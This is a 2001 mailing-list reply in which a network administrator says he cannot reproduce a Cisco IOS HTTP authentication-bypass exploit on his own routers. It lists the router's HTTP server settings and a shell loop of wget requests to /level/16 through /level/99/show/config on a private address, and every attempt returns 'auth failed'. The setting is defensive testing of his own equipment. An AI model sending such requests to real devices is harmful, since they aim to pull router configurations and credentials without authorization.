Re: Cisco device HTTP exploit...

From: Marc-Adrian Napoli (marcadrianat_private)
Date: Mon Jul 02 2001 - 23:57:45 PDT

    hi,

    i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's?

    ip http server
    ip http authentication local

    i have a little /bin/sh that does the following:

    wget http://10.10.10.10/level/16/show/config
    .
    .
    wget http://10.10.10.10/level/99/show/config

    i get auth failed on all of them! anyone?

    Regards,

    Marc-Adrian Napoli
    Network Administrator
    Connect infobahn Australia